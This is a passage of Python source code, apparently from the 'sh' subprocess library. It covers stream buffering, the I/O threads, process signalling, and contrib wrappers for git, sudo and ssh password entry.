if ca["tty_in"] and not stdin_is_fd_based:
attr = termios.tcgetattr(self._stdin_parent_fd)
attr[3] &= ~termios.ECHO
termios.tcsetattr(self._stdin_parent_fd, termios.TCSANOW, attr)
# this represents the connection from a Queue object (or whatever
# we're using to feed STDIN) to the process's STDIN fd
self._stdin_stream = None
if self._stdin_parent_fd:
log = self.log.get_child("streamwriter", "stdin")
self._stdin_stream = StreamWriter(log, self._stdin_parent_fd,
self.stdin, ca["in_bufsize"], ca["encoding"],
ca["tty_in"])
stdout_pipe = None
if pipe is OProc.STDOUT and not ca["no_pipe"]:
stdout_pipe = self._pipe_queue
# this represents the connection from a process's STDOUT fd to
# wherever it has to go, sometimes a pipe Queue (that we will use
# to pipe data to other processes), and also an internal deque
# that we use to aggregate all the output
save_stdout = not ca["no_out"] and \
(tee_out or stdout is None)
pipe_out = ca["piped"] in ("out", True)
pipe_err = ca["piped"] in ("err",)
# if we're piping directly into another process's filedescriptor, we
# bypass reading from the stdout stream altogether, because we've
# already hooked up this processes's stdout fd to the other
# processes's stdin fd
self._stdout_stream = None
if not pipe_out and self._stdout_parent_fd:
if callable(stdout):
stdout = construct_streamreader_callback(self, stdout)
self._stdout_stream = \
StreamReader(
self.log.get_child("streamreader", "stdout"),
self._stdout_parent_fd, stdout, self._stdout,
ca["out_bufsize"], ca["encoding"],
ca["decode_errors"], stdout_pipe,
save_data=save_stdout)
elif self._stdout_parent_fd:
os.close(self._stdout_parent_fd)
# if stderr is going to one place (because it's grouped with stdout,
# or we're dealing with a single tty), then we don't actually need a
# stream reader for stderr, because we've already set one up for
# stdout above
self._stderr_stream = None
if stderr is not OProc.STDOUT and not single_tty and not pipe_err \
and self._stderr_parent_fd:
stderr_pipe = None
if pipe is OProc.STDERR and not ca["no_pipe"]:
stderr_pipe = self._pipe_queue
save_stderr = not ca["no_err"] and \
(ca["tee"] in ("err",) or stderr is None)
if callable(stderr):
stderr = construct_streamreader_callback(self, stderr)
self._stderr_stream = StreamReader(Logger("streamreader"),
self._stderr_parent_fd, stderr, self._stderr,
ca["err_bufsize"], ca["encoding"], ca["decode_errors"],
stderr_pipe, save_data=save_stderr)
elif self._stderr_parent_fd:
os.close(self._stderr_parent_fd)
def timeout_fn():
self.timed_out = True
self.signal(ca["timeout_signal"])
self._timeout_event = None
self._timeout_timer = None
if ca["timeout"]:
self._timeout_event = threading.Event()
self._timeout_timer = threading.Timer(ca["timeout"],
self._timeout_event.set)
self._timeout_timer.start()
# this is for cases where we know that the RunningCommand that was
# launched was not .wait()ed on to complete. in those unique cases,
# we allow the thread that processes output to report exceptions in
# that thread. it's important that we only allow reporting of the
# exception, and nothing else (like the additional stuff that
# RunningCommand.wait() does), because we want the exception to be
# re-raised in the future, if we DO call .wait()
handle_exit_code = None
if not self.command._spawned_and_waited and ca["bg_exc"]:
def fn(exit_code):
with process_assign_lock:
return self.command.handle_command_exit_code(exit_code)
handle_exit_code = fn
self._quit_threads = threading.Event()
thread_name = "background thread for pid %d" % self.pid
self._bg_thread_exc_queue = Queue(1)
self._background_thread = _start_daemon_thread(background_thread,
thread_name, self._bg_thread_exc_queue, timeout_fn,
self._timeout_event, handle_exit_code, self.is_alive,
self._quit_threads)
# start the main io threads. stdin thread is not needed if we are
# connecting from another process's stdout pipe
self._input_thread = None
self._input_thread_exc_queue = Queue(1)
if self._stdin_stream:
close_before_term = not needs_ctty
thread_name = "STDIN thread for pid %d" % self.pid
self._input_thread = _start_daemon_thread(input_thread,
thread_name, self._input_thread_exc_queue, self.log,
self._stdin_stream, self.is_alive, self._quit_threads,
close_before_term)
# this event is for cases where the subprocess that we launch
# launches its OWN subprocess and dups the stdout/stderr fds to that
# new subprocess. in that case, stdout and stderr will never EOF,
# so our output_thread will never finish and will hang. this event
# prevents that hanging
self._stop_output_event = threading.Event()
self._output_thread_exc_queue = Queue(1)
thread_name = "STDOUT/ERR thread for pid %d" % self.pid
self._output_thread = _start_daemon_thread(output_thread,
thread_name, self._output_thread_exc_queue, self.log,
self._stdout_stream, self._stderr_stream,
self._timeout_event, self.is_alive, self._quit_threads,
self._stop_output_event)
def __repr__(self):
return "<Process %d %r>" % (self.pid, self.cmd[:500])
# these next 3 properties are primarily for tests
@property
def output_thread_exc(self):
exc = None
try:
exc = self._output_thread_exc_queue.get(False)
except Empty:
pass
return exc
@property
def input_thread_exc(self):
exc = None
try:
exc = self._input_thread_exc_queue.get(False)
except Empty:
pass
return exc
@property
def bg_thread_exc(self):
exc = None
try:
exc = self._bg_thread_exc_queue.get(False)
except Empty:
pass
return exc
def change_in_bufsize(self, buf):
self._stdin_stream.stream_bufferer.change_buffering(buf)
def change_out_bufsize(self, buf):
self._stdout_stream.stream_bufferer.change_buffering(buf)
def change_err_bufsize(self, buf):
self._stderr_stream.stream_bufferer.change_buffering(buf)
@property
def stdout(self):
return "".encode(self.call_args["encoding"]).join(self._stdout)
@property
def stderr(self):
return "".encode(self.call_args["encoding"]).join(self._stderr)
def get_pgid(self):
""" return the CURRENT group id of the process. this differs from
self.pgid in that this reflects the current state of the process, where
self.pgid is the group id at launch """
return os.getpgid(self.pid)
def get_sid(self):
""" return the CURRENT session id of the process. this differs from
self.sid in that this reflects the current state of the process, where
self.sid is the session id at launch """
return os.getsid(self.pid)
def signal_group(self, sig):
self.log.debug("sending signal %d to group", sig)
os.killpg(self.get_pgid(), sig)
def signal(self, sig):
self.log.debug("sending signal %d", sig)
os.kill(self.pid, sig)
def kill_group(self):
self.log.debug("killing group")
self.signal_group(signal.SIGKILL)
def kill(self):
self.log.debug("killing")
self.signal(signal.SIGKILL)
def terminate(self):
self.log.debug("terminating")
self.signal(signal.SIGTERM)
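# an illustrative sketch: these methods are whitelisted on RunningCommand
# (see _OProc_attr_whitelist), so user code can signal a process directly:
#
#   p = sh.sleep(100, _bg=True)
#   p.signal(signal.SIGINT)     # or p.terminate() / p.kill()
#   p.kill_group()              # the whole process group, via get_pgid()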
def is_alive(self):
""" polls if our child process has completed, without blocking. this
method has side-effects, such as setting our exit_code, if we happen to
see our child exit while this is running """
if self.exit_code is not None:
return False, self.exit_code
# what we're doing here essentially is making sure that the main thread
# (or another thread), isn't calling .wait() on the process. because
# .wait() calls os.waitpid(self.pid, 0), we can't do an os.waitpid
# here...because if we did, and the process exited while in this
# thread, the main thread's os.waitpid(self.pid, 0) would raise OSError
# (because the process ended in another thread).
#
# so essentially what we're doing is, using this lock, checking if
# we're calling .wait(), and if we are, let .wait() get the exit code
# and handle the status, otherwise let us do it.
acquired = self._wait_lock.acquire(False)
if not acquired:
if self.exit_code is not None:
return False, self.exit_code
return True, self.exit_code
try:
# WNOHANG is just that...we're calling waitpid without hanging...
# essentially polling the process. the return result is (0, 0) if
# there's no process status, so we check that pid == self.pid below
# in order to determine how to proceed
pid, exit_code = no_interrupt(os.waitpid, self.pid, os.WNOHANG)
if pid == self.pid:
self.exit_code = handle_process_exit_code(exit_code)
self._process_just_ended()
return False, self.exit_code
# no child process
except OSError:
return False, self.exit_code
else:
return True, self.exit_code
finally:
self._wait_lock.release()
def _process_just_ended(self):
if self._timeout_timer:
self._timeout_timer.cancel()
done_callback = self.call_args["done"]
if done_callback:
success = self.exit_code in self.call_args["ok_code"]
done_callback(success, self.exit_code)
# this can only be closed at the end of the process, because it might be
# the CTTY, and closing it prematurely will send a SIGHUP. we also
# don't want to close it if there's a self._stdin_stream, because that
# is in charge of closing it also
if self._stdin_parent_fd and not self._stdin_stream:
os.close(self._stdin_parent_fd)
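# a hedged sketch of the _done callback invoked above. RunningCommand
# partially applies itself as the first argument (see its __init__), so the
# user's callback receives (cmd, success, exit_code):
#
#   def all_done(cmd, success, exit_code):
#       print(cmd.ran, "ok" if success else "failed", exit_code)
#
#   sh.ls("/tmp", _bg=True, _done=all_done)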
def wait(self):
""" waits for the process to complete, handles the exit code """
self.log.debug("acquiring wait lock to wait for completion")
# using the lock in a with-context blocks, which is what we want if
# we're running wait()
with self._wait_lock:
self.log.debug("got wait lock")
witnessed_end = False
if self.exit_code is None:
self.log.debug("exit code not set, waiting on pid")
pid, exit_code = no_interrupt(os.waitpid, self.pid, 0) # blocks
self.exit_code = handle_process_exit_code(exit_code)
witnessed_end = True
else:
self.log.debug("exit code already set (%d), no need to wait",
self.exit_code)
self._quit_threads.set()
# we may not have a thread for stdin, if the pipe has been connected
# via _piped="direct"
if self._input_thread:
self._input_thread.join()
# wait, then signal to our output thread that the child process is
# done, and we should have finished reading all the stdout/stderr
# data that we can by now
timer = threading.Timer(2.0, self._stop_output_event.set)
timer.start()
# wait for our stdout and stderr streamreaders to finish reading and
# aggregating the process output
self._output_thread.join()
timer.cancel()
self._background_thread.join()
if witnessed_end:
self._process_just_ended()
return self.exit_code
def input_thread(log, stdin, is_alive, quit, close_before_term):
""" this is run in a separate thread. it writes into our process's
stdin (a streamwriter) and waits the process to end AND everything that
can be written to be written """
done = False
closed = False
alive = True
poller = Poller()
poller.register_write(stdin)
while poller and alive:
changed = poller.poll(1)
for fd, events in changed:
if events & (POLLER_EVENT_WRITE | POLLER_EVENT_HUP):
log.debug("%r ready for more input", stdin)
done = stdin.write()
if done:
poller.unregister(stdin)
if close_before_term:
stdin.close()
closed = True
alive, _ = is_alive()
while alive:
quit.wait(1)
alive, _ = is_alive()
if not closed:
stdin.close()
def event_wait(ev, timeout=None):
triggered = ev.wait(timeout)
if IS_PY26:
triggered = ev.is_set()
return triggered
def background_thread(timeout_fn, timeout_event, handle_exit_code, is_alive,
quit):
""" handles the timeout logic """
# if there's a timeout event, loop
if timeout_event:
while not quit.is_set():
timed_out = event_wait(timeout_event, 0.1)
if timed_out:
timeout_fn()
break
# handle_exit_code will be a function ONLY if our command was NOT waited on
# as part of its spawning. in other words, it's probably a background
# command
#
# this reports the exit code exception in our thread. it's purely for the
# user's awareness, and cannot be caught or used in any way, so it's ok to
# suppress this during the tests
if handle_exit_code and not RUNNING_TESTS: # pragma: no cover
alive = True
while alive:
quit.wait(1)
alive, exit_code = is_alive()
handle_exit_code(exit_code)
def output_thread(log, stdout, stderr, timeout_event, is_alive, quit,
stop_output_event):
""" this function is run in a separate thread. it reads from the
process's stdout stream (a streamreader), and waits for it to claim that
its done """
poller = Poller()
if stdout is not None:
poller.register_read(stdout)
if stderr is not None:
poller.register_read(stderr)
# this is our poll loop for polling stdout or stderr that is ready to
# be read and processed. if one of those streamreaders indicate that it
# is done altogether being read from, we remove it from our list of
# things to poll. when no more things are left to poll, we leave this
# loop and clean up
while poller:
changed = no_interrupt(poller.poll, 0.1)
for f, events in changed:
if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
log.debug("%r ready to be read from", f)
done = f.read()
if done:
poller.unregister(f)
elif events & POLLER_EVENT_ERROR:
# for some reason, we have to just ignore streams that have had an
# error. i'm not exactly sure why, but don't remove this until we
# figure that out, and create a test for it
pass
if timeout_event and timeout_event.is_set():
break
if stop_output_event.is_set():
break
# we need to wait until the process is guaranteed dead before closing our
# outputs, otherwise SIGPIPE
alive, _ = is_alive()
while alive:
quit.wait(1)
alive, _ = is_alive()
if stdout:
stdout.close()
if stderr:
stderr.close()
class DoneReadingForever(Exception): pass
class NotYetReadyToRead(Exception): pass
def determine_how_to_read_input(input_obj):
""" given some kind of input object, return a function that knows how to
read chunks of that input object.
each reader function should return a chunk of data, and should raise a
DoneReadingForever exception (or return None) when there's no more data to read
NOTE: the function returned does not need to care much about the requested
buffering type (eg, unbuffered vs newline-buffered). the StreamBufferer
will take care of that. these functions just need to return a
reasonably-sized chunk of data. """
get_chunk = None
if isinstance(input_obj, Queue):
log_msg = "queue"
get_chunk = get_queue_chunk_reader(input_obj)
elif callable(input_obj):
log_msg = "callable"
get_chunk = get_callable_chunk_reader(input_obj)
# also handles stringio
elif hasattr(input_obj, "read"):
log_msg = "file descriptor"
get_chunk = get_file_chunk_reader(input_obj)
elif isinstance(input_obj, basestring):
log_msg = "string"
get_chunk = get_iter_string_reader(input_obj)
elif isinstance(input_obj, bytes):
log_msg = "bytes"
get_chunk = get_iter_string_reader(input_obj)
elif isinstance(input_obj, GeneratorType):
log_msg = "generator"
get_chunk = get_iter_chunk_reader(iter(input_obj))
elif input_obj is None:
log_msg = "None"
def raise_():
raise DoneReadingForever
get_chunk = raise_
else:
try:
it = iter(input_obj)
except TypeError:
raise Exception("unknown input object")
else:
log_msg = "general iterable"
get_chunk = get_iter_chunk_reader(it)
return get_chunk, log_msg
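# an illustrative sketch of the _in types dispatched above:
#
#   sh.cat(_in="hello\n")                      # string
#   sh.cat(_in=open("/etc/hostname", "rb"))    # file-like (has .read)
#   sh.cat(_in=(l for l in ["a\n", "b\n"]))    # generator / general iterable
#
#   q = Queue()                                # queue: feed stdin lazily;
#   sh.cat(_in=q, _bg=True)                    # put None to signal EOF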
def get_queue_chunk_reader(stdin):
def fn():
try:
chunk = stdin.get(True, 0.1)
except Empty:
raise NotYetReadyToRead
if chunk is None:
raise DoneReadingForever
return chunk
return fn
def get_callable_chunk_reader(stdin):
def fn():
try:
data = stdin()
except DoneReadingForever:
raise
if not data:
raise DoneReadingForever
return data
return fn
def get_iter_string_reader(stdin):
""" return an iterator that returns a chunk of a string every time it is
called. notice that even though bufsize_type might be line buffered, we're
not doing any line buffering here. that's because our StreamBufferer
handles all buffering. we just need to return a reasonable-sized chunk. """
bufsize = 1024
iter_str = (stdin[i:i + bufsize] for i in range(0, len(stdin), bufsize))
return get_iter_chunk_reader(iter_str)
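# e.g. for a 3000-character string, the generator above yields chunks of
# lengths 1024, 1024 and 952, which get_iter_chunk_reader then doles out one
# call at a time before raising DoneReadingForever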
def get_iter_chunk_reader(stdin):
def fn():
try:
if IS_PY3:
chunk = stdin.__next__()
else:
chunk = stdin.next()
return chunk
except StopIteration:
raise DoneReadingForever
return fn
def get_file_chunk_reader(stdin):
bufsize = 1024
def fn():
# python 3.* includes a fileno on stringios, but accessing it throws an
# exception. that exception is how we'll know we can't do a poll on
# stdin
is_real_file = True
if IS_PY3:
try:
stdin.fileno()
except UnsupportedOperation:
is_real_file = False
# this poll is for files that may not yet be ready to read. we test
# for fileno because StringIO/BytesIO cannot be used in a poll
if is_real_file and hasattr(stdin, "fileno"):
poller = Poller()
poller.register_read(stdin)
changed = poller.poll(0.1)
ready = False
for fd, events in changed:
if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
ready = True
if not ready:
raise NotYetReadyToRead
chunk = stdin.read(bufsize)
if not chunk:
raise DoneReadingForever
else:
return chunk
return fn
def bufsize_type_to_bufsize(bf_type):
""" for a given bufsize type, return the actual bufsize we will read.
notice that although 1 means "newline-buffered", we're reading a chunk size
of 1024. this is because we have to read something. we let a
StreamBufferer instance handle splitting our chunk on newlines """
# newlines
if bf_type == 1:
bufsize = 1024
# unbuffered
elif bf_type == 0:
bufsize = 1
# or buffered by specific amount
else:
bufsize = bf_type
return bufsize
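# illustration of the mapping above:
#   bufsize_type_to_bufsize(1)  -> 1024  (line-buffered: read big chunks, split on newlines later)
#   bufsize_type_to_bufsize(0)  -> 1     (unbuffered: read a byte at a time)
#   bufsize_type_to_bufsize(n)  -> n     (buffered by a specific amount)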
class StreamWriter(object):
""" StreamWriter reads from some input (the stdin param) and writes to a fd
(the stream param). the stdin may be a Queue, a callable, something with
the "read" method, a string, or an iterable """
def __init__(self, log, stream, stdin, bufsize_type, encoding, tty_in):
self.stream = stream
self.stdin = stdin
self.log = log
self.encoding = encoding
self.tty_in = tty_in
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding)
self.get_chunk, log_msg = determine_how_to_read_input(stdin)
self.log.debug("parsed stdin as a %s", log_msg)
def fileno(self):
""" defining this allows us to do poll on an instance of this
class """
return self.stream
def write(self):
""" attempt to get a chunk of data to write to our child process's
        stdin, then write it. the return value answers the question "are we
done writing forever?" """
# get_chunk may sometimes return bytes, and sometimes return strings
# because of the nature of the different types of STDIN objects we
# support
try:
chunk = self.get_chunk()
if chunk is None:
raise DoneReadingForever
except DoneReadingForever:
self.log.debug("done reading")
if self.tty_in:
# EOF time
try:
char = termios.tcgetattr(self.stream)[6][termios.VEOF]
except:
char = chr(4).encode()
                # normally, one EOF should be enough to signal to a program
                # that is read()ing to return 0 and be on its way. however,
# some programs are misbehaved, like python3.1 and python3.2.
# they don't stop reading sometimes after read() returns 0.
# this can be demonstrated with the following program:
#
# import sys
# sys.stdout.write(sys.stdin.read())
#
# then type 'a' followed by ctrl-d 3 times. in python
# 2.6,2.7,3.3,3.4,3.5,3.6, it only takes 2 ctrl-d to terminate.
# however, in python 3.1 and 3.2, it takes all 3.
#
# so here we send an extra EOF along, just in case. i don't
# believe it can hurt anything
os.write(self.stream, char)
os.write(self.stream, char)
return True
except NotYetReadyToRead:
self.log.debug("received no data")
return False
# if we're not bytes, make us bytes
if IS_PY3 and hasattr(chunk, "encode"):
chunk = chunk.encode(self.encoding)
for proc_chunk in self.stream_bufferer.process(chunk):
self.log.debug("got chunk size %d: %r", len(proc_chunk),
proc_chunk[:30])
self.log.debug("writing chunk to process")
try:
os.write(self.stream, proc_chunk)
except OSError:
self.log.debug("OSError writing stdin chunk")
return True
def close(self):
self.log.debug("closing, but flushing first")
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
try:
if chunk:
os.write(self.stream, chunk)
except OSError:
pass
os.close(self.stream)
def determine_how_to_feed_output(handler, encoding, decode_errors):
if callable(handler):
process, finish = get_callback_chunk_consumer(handler, encoding,
decode_errors)
# in py3, this is used for bytes
elif isinstance(handler, (cStringIO, iocStringIO)):
process, finish = get_cstringio_chunk_consumer(handler)
# in py3, this is used for unicode
elif isinstance(handler, (StringIO, ioStringIO)):
process, finish = get_stringio_chunk_consumer(handler, encoding,
decode_errors)
elif hasattr(handler, "write"):
process, finish = get_file_chunk_consumer(handler)
else:
try:
handler = int(handler)
except (ValueError, TypeError):
process = lambda chunk: False
finish = lambda: None
else:
process, finish = get_fd_chunk_consumer(handler)
return process, finish
def get_fd_chunk_consumer(handler):
handler = fdopen(handler, "w", closefd=False)
return get_file_chunk_consumer(handler)
def get_file_chunk_consumer(handler):
encode = lambda chunk: chunk
if getattr(handler, "encoding", None):
encode = lambda chunk: chunk.decode(handler.encoding)
flush = lambda: None
if hasattr(handler, "flush"):
flush = handler.flush
def process(chunk):
handler.write(encode(chunk))
# we should flush on an fd. chunk is already the correctly-buffered
# size, so we don't need the fd buffering as well
flush()
return False
def finish():
flush()
return process, finish
def get_callback_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
# try to use the encoding first, if that doesn't work, send
# the bytes, because it might be binary
try:
chunk = chunk.decode(encoding, decode_errors)
except UnicodeDecodeError:
pass
return handler(chunk)
def finish():
pass
return process, finish
def get_cstringio_chunk_consumer(handler):
def process(chunk):
handler.write(chunk)
return False
def finish():
pass
return process, finish
def get_stringio_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
handler.write(chunk.decode(encoding, decode_errors))
return False
def finish():
pass
return process, finish
class StreamReader(object):
""" reads from some output (the stream) and sends what it just read to the
handler. """
def __init__(self, log, stream, handler, buffer, bufsize_type, encoding,
decode_errors, pipe_queue=None, save_data=True):
self.stream = stream
self.buffer = buffer
self.save_data = save_data
self.encoding = encoding
self.decode_errors = decode_errors
self.pipe_queue = None
if pipe_queue:
self.pipe_queue = weakref.ref(pipe_queue)
self.log = log
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding,
self.decode_errors)
self.bufsize = bufsize_type_to_bufsize(bufsize_type)
self.process_chunk, self.finish_chunk_processor = \
determine_how_to_feed_output(handler, encoding, decode_errors)
self.should_quit = False
def fileno(self):
""" defining this allows us to do poll on an instance of this
class """
return self.stream
def close(self):
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
if chunk:
self.write_chunk(chunk)
self.finish_chunk_processor()
if self.pipe_queue and self.save_data:
self.pipe_queue().put(None)
os.close(self.stream)
def write_chunk(self, chunk):
# in PY3, the chunk coming in will be bytes, so keep that in mind
if not self.should_quit:
self.should_quit = self.process_chunk(chunk)
if self.save_data:
self.buffer.append(chunk)
if self.pipe_queue:
self.log.debug("putting chunk onto pipe: %r", chunk[:30])
self.pipe_queue().put(chunk)
def read(self):
# if we're PY3, we're reading bytes, otherwise we're reading
# str
try:
chunk = no_interrupt(os.read, self.stream, self.bufsize)
except OSError as e:
self.log.debug("got errno %d, done reading", e.errno)
return True
if not chunk:
self.log.debug("got no chunk, done reading")
return True
self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30])
for chunk in self.stream_bufferer.process(chunk):
self.write_chunk(chunk)
class StreamBufferer(object):
""" this is used for feeding in chunks of stdout/stderr, and breaking it up
into chunks that will actually be put into the internal buffers. for
example, if you have two processes, one being piped to the other, and you
    want the first process to feed lines of data (instead of the chunks
however they come in), OProc will use an instance of this class to chop up
the data and feed it as lines to be sent down the pipe """
def __init__(self, buffer_type, encoding=DEFAULT_ENCODING,
decode_errors="strict"):
# 0 for unbuffered, 1 for line, everything else for that amount
self.type = buffer_type
self.buffer = []
self.n_buffer_count = 0
self.encoding = encoding
self.decode_errors = decode_errors
# this is for if we change buffering types. if we change from line
        # buffered to unbuffered, it's very possible that our self.buffer list
# has data that was being saved up (while we searched for a newline).
# we need to use that up, so we don't lose it
self._use_up_buffer_first = False
# the buffering lock is used because we might change the buffering
# types from a different thread. for example, if we have a stdout
# callback, we might use it to change the way stdin buffers. so we
# lock
self._buffering_lock = threading.RLock()
self.log = Logger("stream_bufferer")
def change_buffering(self, new_type):
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock for changing buffering")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for changing buffering")
try:
if new_type == 0:
self._use_up_buffer_first = True
self.type = new_type
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for changing buffering")
def process(self, chunk):
# MAKE SURE THAT THE INPUT IS PY3 BYTES
# THE OUTPUT IS ALWAYS PY3 BYTES
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock to process chunk (buffering: %d)", self.type)
self._buffering_lock.acquire()
self.log.debug("got buffering lock to process chunk (buffering: %d)", self.type)
try:
# unbuffered
if self.type == 0:
if self._use_up_buffer_first:
self._use_up_buffer_first = False
to_write = self.buffer
self.buffer = []
to_write.append(chunk)
return to_write
return [chunk]
# line buffered
elif self.type == 1:
total_to_write = []
nl = "\n".encode(self.encoding)
while True:
newline = chunk.find(nl)
if newline == -1:
break
chunk_to_write = chunk[:newline + 1]
if self.buffer:
chunk_to_write = b"".join(self.buffer) + chunk_to_write
self.buffer = []
self.n_buffer_count = 0
chunk = chunk[newline + 1:]
total_to_write.append(chunk_to_write)
if chunk:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
return total_to_write
# N size buffered
else:
total_to_write = []
while True:
overage = self.n_buffer_count + len(chunk) - self.type
if overage >= 0:
ret = "".encode(self.encoding).join(self.buffer) + chunk
chunk_to_write = ret[:self.type]
chunk = ret[self.type:]
total_to_write.append(chunk_to_write)
self.buffer = []
self.n_buffer_count = 0
else:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
break
return total_to_write
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for processing chunk (buffering: %d)", self.type)
def flush(self):
self.log.debug("acquiring buffering lock for flushing buffer")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for flushing buffer")
try:
ret = "".encode(self.encoding).join(self.buffer)
self.buffer = []
return ret
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for flushing buffer")
def with_lock(lock):
def wrapped(fn):
fn = contextmanager(fn)
@contextmanager
def wrapped2(*args, **kwargs):
with lock:
with fn(*args, **kwargs):
yield
return wrapped2
return wrapped
@with_lock(PUSHD_LOCK)
def pushd(path):
""" pushd changes the actual working directory for the duration of the
context, unlike the _cwd arg this will work with other built-ins such as
sh.glob correctly """
orig_path = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(orig_path)
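# usage sketch for pushd (hypothetical path):
#   with pushd("/tmp"):
#       ...  # os.getcwd() == "/tmp" in here
#   # the original working directory is restored on exit, even on exception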
@contextmanager
def args(**kwargs):
""" allows us to temporarily override all the special keyword parameters in
a with context """
kwargs_str = ",".join(["%s=%r" % (k,v) for k,v in kwargs.items()])
raise DeprecationWarning("""
sh.args() has been deprecated because it was never thread safe. use the
following instead:
sh2 = sh({kwargs})
sh2.your_command()
or
sh2 = sh({kwargs})
from sh2 import your_command
your_command()
""".format(kwargs=kwargs_str))
class Environment(dict):
""" this allows lookups to names that aren't found in the global scope to be
searched for as a program name. for example, if "ls" isn't found in this
module's scope, we consider it a system program and try to find it.
we use a dict instead of just a regular object as the base class because the
exec() statement used in the run_repl requires the "globals" argument to be a
dictionary """
# this is a list of all of the names that the sh module exports that will
# not resolve to functions. we don't want to accidentally shadow real
# commands with functions/imports that we define in sh.py. for example,
# "import time" may override the time system program
whitelist = set([
"Command",
"RunningCommand",
"CommandNotFound",
"DEFAULT_ENCODING",
"DoneReadingForever",
"ErrorReturnCode",
"NotYetReadyToRead",
"SignalException",
"ForkException",
"TimeoutException",
"__project_url__",
"__version__",
"__file__",
"args",
"pushd",
"glob",
"contrib",
])
def __init__(self, globs, baked_args={}):
""" baked_args are defaults for the 'sh' execution context. for
example:
tmp = sh(_out=StringIO())
'out' would end up in here as an entry in the baked_args dict """
self.globs = globs
self.baked_args = baked_args
self.disable_whitelist = False
def __getitem__(self, k):
# if we first import "_disable_whitelist" from sh, we can import
# anything defined in the global scope of sh.py. this is useful for our
# tests
if k == "_disable_whitelist":
self.disable_whitelist = True
return None
# we're trying to import something real (maybe), see if it's in our
# global scope
if k in self.whitelist or self.disable_whitelist:
return self.globs[k]
# somebody tried to be funny and do "from sh import *"
if k == "__all__":
warnings.warn("Cannot import * from sh. Please import sh or import programs individually.")
return []
# check if we're naming a dynamically generated ReturnCode exception
exc = get_exc_from_name(k)
if exc:
return exc
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
if k.startswith("__") and k.endswith("__"):
raise AttributeError
# is it a custom builtin?
builtin = getattr(self, "b_" + k, None)
if builtin:
return builtin
# is it a command?
cmd = resolve_command(k, self.baked_args)
if cmd:
return cmd
# how about an environment variable?
        # this check must come after testing if it's a command, because on
        # some systems, there are environment variables that can conflict
        # with command names.
# https://github.com/amoffat/sh/issues/238
try:
return os.environ[k]
except KeyError:
pass
# nothing found, raise an exception
raise CommandNotFound(k)
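    # (net lookup order in __getitem__: whitelisted globals -> dynamic
    # ReturnCode exceptions -> b_* builtins -> PATH commands -> environment
    # variables -> CommandNotFound)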
# methods that begin with "b_" are custom builtins and will override any
# program that exists in our path. this is useful for things like
# common shell builtins that people are used to, but which aren't actually
# full-fledged system binaries
def b_cd(self, path=None):
if path:
os.chdir(path)
else:
os.chdir(os.path.expanduser('~'))
def b_which(self, program, paths=None):
return which(program, paths)
class Contrib(ModuleType): # pragma: no cover
@classmethod
def __call__(cls, name):
def wrapper1(fn):
@property
def cmd_getter(self):
cmd = resolve_command(name)
if not cmd:
raise CommandNotFound(name)
new_cmd = fn(cmd)
return new_cmd
setattr(cls, name, cmd_getter)
return fn
return wrapper1
mod_name = __name__ + ".contrib"
contrib = Contrib(mod_name)
sys.modules[mod_name] = contrib
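# the decorator below registers wrapped commands on the contrib pseudo-module,
# so (assuming git is installed) they can be used roughly like:
#   import sh
#   sh.contrib.git.status()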
@contrib("git")
def git(orig): # pragma: no cover
""" most git commands play nicer without a TTY """
cmd = orig.bake(_tty_out=False)
return cmd
@contrib("sudo")
def sudo(orig): # pragma: no cover
""" a nicer version of sudo that uses getpass to ask for a password, or
allows the first argument to be a string password """
prompt = "[sudo] password for %s: " % getpass.getuser()
def stdin():
pw = getpass.getpass(prompt=prompt) + "\n"
yield pw
def process(args, kwargs):
password = kwargs.pop("password", None)
if password is None:
pass_getter = stdin()
else:
pass_getter = password.rstrip("\n") + "\n"
kwargs["_in"] = pass_getter
return args, kwargs
cmd = orig.bake("-S", _arg_preprocess=process)
return cmd
@contrib("ssh")
def ssh(orig): # pragma: no cover
""" An ssh command for automatic password login """
class SessionContent(object):
def __init__(self):
self.chars = deque(maxlen=50000)
self.lines = deque(maxlen=5000)
self.line_chars = []
self.last_line = ""
self.cur_char = ""
def append_char(self, char):
if char == "\n":
line = self.cur_line
self.last_line = line
self.lines.append(line)
self.line_chars = []
else:
self.line_chars.append(char)
self.chars.append(char)
self.cur_char = char
@property
def cur_line(self):
line = "".join(self.line_chars)
return line
class SSHInteract(object):
def __init__(self, prompt_match, pass_getter, out_handler, login_success):
self.prompt_match = prompt_match
self.pass_getter = pass_getter
self.out_handler = out_handler
self.login_success = login_success
self.content = SessionContent()
# some basic state
self.pw_entered = False
self.success = False
def __call__(self, char, stdin):
self.content.append_char(char)
if self.pw_entered and not self.success:
self.success = self.login_success(self.content)
if self.success:
return self.out_handler(self.content, stdin)
if self.prompt_match(self.content):
password = self.pass_getter()
stdin.put(password + "\n")
self.pw_entered = True
def process(args, kwargs):
real_out_handler = kwargs.pop("interact")
password = kwargs.pop("password", None)
login_success = kwargs.pop("login_success", None)
prompt_match = kwargs.pop("prompt", None)
prompt = "Please enter SSH password: "
if prompt_match is None:
prompt_match = lambda content: content.cur_line.endswith("password: ")
if password is None:
pass_getter = lambda: getpass.getpass(prompt=prompt)
else:
pass_getter = lambda: password.rstrip("\n")
if login_success is None:
login_success = lambda content: True
kwargs["_out"] = SSHInteract(prompt_match, pass_getter, real_out_handler, login_success)
return args, kwargs
cmd = orig.bake(_out_bufsize=0, _tty_in=True, _unify_ttys=True, _arg_preprocess=process)
return cmd
def run_repl(env): # pragma: no cover
